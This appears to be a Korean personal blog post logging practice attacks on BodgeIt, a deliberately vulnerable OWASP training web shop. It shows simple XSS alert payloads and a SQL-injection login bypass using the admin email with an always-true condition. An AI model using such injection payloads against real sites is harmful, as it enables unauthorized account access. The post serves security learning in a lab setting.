oswasp 실습(BodgeIt)

2020. 12. 7. 16:49·Web hacking

 

 

 

 

 

 

------------------------------

 

script 공격

 

<script>alert("taktaktaktak")</script>

 

 

 

 

 

<script>alert('taktaktak')</scirpt>

 

 

 

---------------------------------------

 

 

sqlmap은 적용이되지않는다.

 

 

 

 

 

---------------------------------

 

 

 

 

- ----------------------------

 

5글자를 넣으라고한다.

 

 

 

 

 

 

about us 

들어가서!

 

저것을복사해본다

 

 

admin@thebodgeitstore.com

 

 

 

 

 

 

 

admin@thebodgeitstore.com' or '1'='1'#

 

주석처리가 불가능하다

 

select * from user where username='--' and password=''

 

원래는 주석처리가되서 로그인이되면

 

이번것은

 

select * from user where

username='admin@thebodgeitstore.com' or '1'='1' and

password='aaaaa'

 

 

 

이렇게 추측을 한다.

5글자의 단서가 아니면 불가능한것이였다

 

 

 

 

 

 

admin@thebodgeitstore.com' or '1'='1

aaaa 

 

이렇게하게된다면

 

 

 

 

 

 

성공하였다! 

'Web hacking' 카테고리의 다른 글

owasp 실습(bwapp) -2 (sql injection blind time based)  (0) 2020.12.08
owasp 실습(bwapp) -1 (SQL injection blind boolean based)  (0) 2020.12.08
owasp 실습(WackoPicko)  (0) 2020.12.07
owasp 실습 (peruggia)  (0) 2020.12.07
파일업로드 취약점,소스코드공개될때 가능한취약점  (0) 2020.12.01
'Web hacking' 카테고리의 다른 글
  • owasp 실습(bwapp) -2 (sql injection blind time based)
  • owasp 실습(bwapp) -1 (SQL injection blind boolean based)
  • owasp 실습(WackoPicko)
  • owasp 실습 (peruggia)
taktaks
taktaks
보안 연습 일기장입니다. 모든 연습은 불법적인 용도로 사용하지 말아주시길 부탁드립니다. 용무는 wndudxkr2005@gmail.com 메일 부탁드립니다.
  • taktaks
    taktaks
    taktaks
  • 전체
    오늘
    어제
    • 보안 일지 (280)
      • 네트워크 구축 (12)
      • 리눅스 보안구축 (10)
      • 파이썬 기본 (11)
      • Web hacking (39)
      • 통합 인프라 보안 (41)
      • 공격기법 및 탐지 (33)
      • 악성코드 및 포렌식 (93)
      • 리버싱 (5)
      • 시스템 해킹 (20)
      • C 언어 (12)
  • 블로그 메뉴

    • 링크

    • 공지사항

    • 인기 글

    • 태그

      프롯
    • 최근 댓글

    • 최근 글

    • hELLO· Designed By정상우.v4.10.3
    taktaks
    oswasp 실습(BodgeIt)
    상단으로

    티스토리툴바